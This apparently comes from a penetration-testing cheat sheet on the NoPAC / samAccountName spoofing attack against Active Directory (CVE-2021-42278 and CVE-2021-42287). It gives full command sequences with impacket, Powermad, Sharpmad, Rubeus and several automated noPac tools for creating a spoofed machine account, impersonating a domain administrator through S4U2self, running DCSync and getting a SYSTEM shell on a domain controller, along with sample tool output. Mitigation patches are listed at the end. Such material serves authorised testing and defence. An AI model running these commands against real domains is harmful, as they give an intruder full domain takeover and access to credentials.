NoPAC / samAccountName Spoofing
During S4U2Self, the KDC will try to append a '\$' to the computer name specified in the TGT, if the computer name is not found. An attacker can create a new machine account with the sAMAccountName set to a domain controller's sAMAccountName - without the '\$'. For instance, suppose there is a domain controller with a sAMAccountName set to 'DC\$'. An attacker would then create a machine account with the sAMAccountName set to 'DC'. The attacker can then request a TGT for the newly created machine account. After the TGT has been issued by the KDC, the attacker can rename the newly created machine account to something different, e.g. JOHNS-PC. The attacker can then perform S4U2Self and request a ST to itself as any user. Since the machine account with the sAMAccountName set to 'DC' has been renamed, the KDC will try to find the machine account by appending a '$', which will then match the domain controller. The KDC will then issue a valid ST for the domain controller.
Requirements
- MachineAccountQuota > 0
Check for exploitation
- Check the MachineAccountQuota of the account
- Check if the DC is vulnerable
Exploitation
- Create a computer account
impacket@linux> addcomputer.py -computer-name 'ControlledComputer$' -computer-pass 'ComputerPassword' -dc-host DC01 -domain-netbios domain 'domain.local/user1:complexpassword' powermad@windows> . .\Powermad.ps1 powermad@windows> $password = ConvertTo-SecureString 'ComputerPassword' -AsPlainText -Force powermad@windows> New-MachineAccount -MachineAccount "ControlledComputer" -Password $($password) -Domain "domain.local" -DomainController "DomainController.domain.local" -Verbose sharpmad@windows> Sharpmad.exe MAQ -Action new -MachineAccount ControlledComputer -MachinePassword ComputerPassword
- Clear the controlled machine account
servicePrincipalName
attribute - (CVE-2021-42278) Change the controlled machine account
sAMAccountName
to a Domain Controller's name without the trailing$
# https://github.com/SecureAuthCorp/impacket/pull/1224 impacket@linux> renameMachine.py -current-name 'ControlledComputer$' -new-name 'DomainController' -dc-ip 'DomainController.domain.local' 'domain.local'/'user':'password' powermad@windows> Set-MachineAccountAttribute -MachineAccount "ControlledComputer" -Value "DomainController" -Attribute samaccountname -Verbose
- Request a TGT for the controlled machine account
- Reset the controlled machine account sAMAccountName to its old value
- (CVE-2021-42287) Request a service ticket with
S4U2self
by presenting the TGT obtained before# https://github.com/SecureAuthCorp/impacket/pull/1202 impacket@linux> KRB5CCNAME='DomainController.ccache' getST.py -self -impersonate 'DomainAdmin' -spn 'cifs/DomainController.domain.local' -k -no-pass -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController' cmd@windows> Rubeus.exe s4u /self /impersonateuser:"DomainAdmin" /altservice:"ldap/DomainController.domain.local" /dc:"DomainController.domain.local" /ptt /ticket:[Base64 TGT]
- DCSync
Automated exploitation:
- cube0x0/noPac - Windows
noPac.exe scan -domain htb.local -user user -pass 'password123' noPac.exe -domain htb.local -user domain_user -pass 'Password123!' /dc dc.htb.local /mAccount demo123 /mPassword Password123! /service cifs /ptt noPac.exe -domain htb.local -user domain_user -pass "Password123!" /dc dc.htb.local /mAccount demo123 /mPassword Password123! /service ldaps /ptt /impersonate Administrator
- Ridter/noPac - Linux
- WazeHell/sam-the-admin
$ python3 sam_the_admin.py "domain/user:password" -dc-ip 10.10.10.10 -shell [*] Selected Target dc.caltech.white [*] Total Domain Admins 11 [*] will try to impersonat gaylene.dreddy [*] Current ms-DS-MachineAccountQuota = 10 [*] Adding Computer Account "SAMTHEADMIN-11$" [*] MachineAccount "SAMTHEADMIN-11$" password = EhFMT%mzmACL [*] Successfully added machine account SAMTHEADMIN-11$ with password EhFMT%mzmACL. [*] SAMTHEADMIN-11$ object = CN=SAMTHEADMIN-11,CN=Computers,DC=caltech,DC=white [*] SAMTHEADMIN-11$ sAMAccountName == dc [*] Saving ticket in dc.ccache [*] Resting the machine account to SAMTHEADMIN-11$ [*] Restored SAMTHEADMIN-11$ sAMAccountName to original value [*] Using TGT from cache [*] Impersonating gaylene.dreddy [*] Requesting S4U2self [*] Saving ticket in gaylene.dreddy.ccache [!] Launching semi-interactive shell - Careful what you execute C:\Windows\system32>whoami nt authority\system
- ly4k/Pachine
usage: pachine.py [-h] [-scan] [-spn SPN] [-impersonate IMPERSONATE] [-domain-netbios NETBIOSNAME] [-computer-name NEW-COMPUTER-NAME$] [-computer-pass password] [-debug] [-method {SAMR,LDAPS}] [-port {139,445,636}] [-baseDN DC=test,DC=local] [-computer-group CN=Computers,DC=test,DC=local] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] -dc-host hostname [-dc-ip ip] [domain/]username[:password] $ python3 pachine.py -dc-host dc.domain.local -scan 'domain.local/john:Passw0rd!' $ python3 pachine.py -dc-host dc.domain.local -spn cifs/dc.domain.local -impersonate administrator 'domain.local/john:Passw0rd!' $ export KRB5CCNAME=$PWD/administrator@domain.local.ccache $ impacket-psexec -k -no-pass 'domain.local/administrator@dc.domain.local'
Mitigations:
- KB5007247 - Windows Server 2012 R2
- KB5008601 - Windows Server 2016
- KB5008602 - Windows Server 2019
- KB5007205 - Windows Server 2022
- KB5008102
- KB5008380